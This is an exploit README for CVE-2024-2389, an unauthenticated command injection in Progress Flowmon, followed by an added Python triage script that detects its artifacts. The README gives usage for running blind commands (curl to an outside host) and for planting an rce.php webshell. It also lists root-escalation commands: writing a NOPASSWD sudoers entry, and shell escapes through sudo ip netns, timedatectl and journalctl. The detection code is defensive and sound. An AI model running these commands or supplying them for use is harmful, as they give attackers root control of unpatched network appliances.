Description: This exploits an unauthenticated command injection in the Progress Software Flowmon application.
Versions Affected: Tested on v12.03.02
Version Fixed: 12.3.5/11.1.14
Researcher: Dave Yesland (https://x.com/daveysec)
Disclosure Link: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-2389
Vendor Advisory: https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
This exploits a command injection flaw in an unauthenticated PDF generator endpoint (PdfGenerator.php).
To run a blind command:
python3 CVE-2024-2389 --cmd 'curl a.server' TARGET
To write a simple webshell:
python3 CVE-2024-2389 --web-shell TARGET
Then visit TARGET/rce.php
A root shell can be obtained through several methods:
cp /var/www/shtml/index.php /tmp/index.php.bak;
echo '<?php system("echo \"ADMINS ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers"); ?>' > /var/www/shtml/index.php;
sudo /usr/bin/php /var/www/shtml/index.php Cli\:AddNewSource s;
cp /tmp/index.php.bak /var/www/shtml/index.php;
# ip command:
sudo ip netns add foo
sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar
sudo ip netns exec bar /bin/bash
sudo ip netns delete foo
sudo ip netns delete bar
# Abusing the timedatectl command:
sudo timedatectl list-timezones
!/bin/bash
# Abusing journalctl:
sudo journalctl
!/bin/bash
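Added defender-side triage (not part of this exploit README or its author's code): it applies the fixed-version boundaries stated above (12.3.5 for 12.x, 11.1.14 for 11.x) to a Flowmon version string, and checks a host or mounted image for the artifacts the steps above leave behind, namely the rce.php webshell, the NOPASSWD line appended to /etc/sudoers, and a /var/run/netns symlink into PID 1's namespace. The `demo()` function scans a constructed temporary tree, not a real host.

```python
import os
import re
import tempfile
from pathlib import Path

# Fixed releases from the README: 12.3.5 for the 12.x line, 11.1.14 for the 11.x line.
FIXED = {12: (12, 3, 5), 11: (11, 1, 14)}
# Artifacts the README's post-exploitation steps leave on disk (paths and strings as given there).
WEBSHELL = "var/www/shtml/rce.php"
SUDOERS_MARKER = "ADMINS ALL=(ALL) NOPASSWD: ALL"
NETNS_DIR = "var/run/netns"

def parse_version(text):
    """'v12.03.02' or '12.3.5' -> (12, 3, 2); leading zeros are not significant."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable(version):
    """True below the fixed release of its 11.x/12.x line; None for lines the README does not cover."""
    v = parse_version(version)
    fixed = FIXED.get(v[0])
    return None if fixed is None else v < fixed

def check_host(root="/"):
    """Findings for the webshell, sudoers line and netns symlink; `root` may be a mounted forensic image."""
    base, findings = Path(root), []
    if (base / WEBSHELL).exists():
        findings.append(f"webshell present: /{WEBSHELL}")
    sudoers = base / "etc/sudoers"
    if sudoers.is_file() and SUDOERS_MARKER in sudoers.read_text(errors="replace"):
        findings.append("sudoers contains the NOPASSWD line written by the PHP payload")
    netns = base / NETNS_DIR
    for entry in (netns.iterdir() if netns.is_dir() else []):
        if entry.is_symlink() and os.readlink(entry).startswith("/proc/1/ns/"):
            findings.append(f"netns symlink into PID 1's namespace: /{entry.relative_to(base)}")
    return findings

def demo():
    """Scan a constructed temporary tree seeded with all three artifacts (sample data, not a real host)."""
    with tempfile.TemporaryDirectory() as root:
        base = Path(root)
        for rel in (WEBSHELL, "etc/sudoers", NETNS_DIR + "/bar"):
            (base / rel).parent.mkdir(parents=True, exist_ok=True)
        (base / WEBSHELL).write_text("constructed placeholder\n")
        (base / "etc/sudoers").write_text("root ALL=(ALL) ALL\n" + SUDOERS_MARKER + "\n")
        os.symlink("/proc/1/ns/net", base / NETNS_DIR / "bar")
        return check_host(root)
```

Run `check_host("/")` as root on a live appliance, or point `root` at a mounted disk image; any returned finding warrants an incident response rather than just patching.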